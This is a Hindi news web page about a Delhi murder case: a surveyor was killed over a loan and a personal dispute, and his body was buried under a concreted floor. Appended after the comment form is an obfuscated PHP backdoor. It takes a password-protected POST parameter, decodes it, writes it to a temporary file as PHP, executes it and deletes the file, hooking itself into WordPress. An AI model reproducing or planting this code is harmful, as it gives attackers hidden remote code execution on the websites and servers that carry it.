Delhi: पांच पॉलिथीन में पैक की लाश, सर्वेयर जितना तड़पा उतने ही वार करता रहा अनीस… रोंगटे खड़े करने वाला कबूलनामा

Uttarakhand Press 20 September 2023: दिल्ली में सर्वेयर की हत्या कर शव को जमीन में गाड़कर फर्श को पक्का करवाने का मामला सामने आया है। पुलिस ने शव बरामद कर लिया है। आरोपी ने सिर पर पाइप रिंच से वारकर वारदात को अंजाम दिया गया। ऑफिस की युवती से प्रेम प्रसंग और पैसे के विवाद में आरोपी ने वारदात को अंजाम दिया।

दिल्ली के सरोजनी नगर स्थित सर्वे ऑफ इंडिया डिफेंस ऑफिसर कॉम्पलेक्स के सीनियर सर्वेयर महेश कुमार की हत्या मामले में रोंगटे खड़े कर देने वाला खुलासा हुआ है। आरोपी अनीस सर्वेयर महेश पर तब तक वार कर रहा, जब तक वह तड़पता रहा।

उसने पीड़ित के सिर पर पाइप रिंच से वार किए। पहले ही वार में महेश नीचे गिर गया। आरोपी ने बताया कि उसने महेश की हत्या की साजिश करीब 20 दिन पहले रच ली थी। दक्षिण-पश्चिमी जिला पुलिस अधिकारियों के अनुसार, अनीस ने महेश की हत्या 28 अगस्त को की थी।

इसके बाद आरोपी साउथ एक्स मार्केट गया, वहां से बड़ी वाली पांच पॉलिथीन खरीद कर लाया। आरोपी ने महेश के शव को पांच पॉलिथीन में पैक किया और फिर शव को कार की डिक्की में रख दिया। आरोपी ने महेश के शव को इस तरह पैक किया कि खून की एक बूंद भी बाहर नहीं निकली।

अगले दिन यानि 29 सितंबर को उसने महेश के शव को मकान नंबर-623, सेक्टर-दो आरके पुरम में स्थित मकान के आंगन में जमीन में गाड़ दिया। इसके बाद 30 अगस्त को फर्श को पक्का करवा दिया।

आरके पुरम थानाध्यक्ष रविंद्र कुमार त्यागी की देखरेख में इंस्पेक्टर सुरेंद्र व एसआई पवन की टीम ने आरोपी अनीस को गिरफ्तार किया है। पुलिस ने जब शव को जमीन से निकाला तो शव सड़-गल चुका था। पुलिस अधिकारियों के अनुसार पुलिस को महेश के शव की पोस्टमार्टम रिपोर्ट मिल गई है। पोस्टमार्टम रिपोर्ट में सिर में लगी चोटों को मौत की वजह बताया गया है।

महेश की हत्या की वजह:
पुलिस अधिकारियों के अनुसार, अनीस की उसके कार्यालय में काम करने वाली युवती से दोस्ती थी। महेश की इस युवती से नजदीकियां हो गई थी। महेश ने अनीस को युवती को लेकर अपशब्द कहे थे। इससे अनीस नाराज हो गया।

इसके अलावा महेश ने अनीस को नौ लाख रुपये उधार दे रखे थे। अनीस इस रकम को लौटाना नहीं चाहता था। महिला दोस्त को अपशब्द कहने व पैसे नहीं लौटाने से नाराज अनीस ने करीब 20 दिन पहले महेश की हत्या की साजिश रच ली थी। पुलिस ने अनीस के कब्जे से महेश द्वारा उधार दिए गए पांच लाख रुपये बरामद कर लिए हैं।

Read Previous

Uttarakhand: अब मरीजों को नहीं काटने होंगे निजी अस्पतालों के चक्कर, दून अस्पताल में मिलेगी Endoscopy की सुविधा

Read Next

हत्याकांड: वृद्ध पर चाकू से हमला कर की हत्या, ग्रामीणों ने हत्यारे को पकड़ कर मार डाला

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}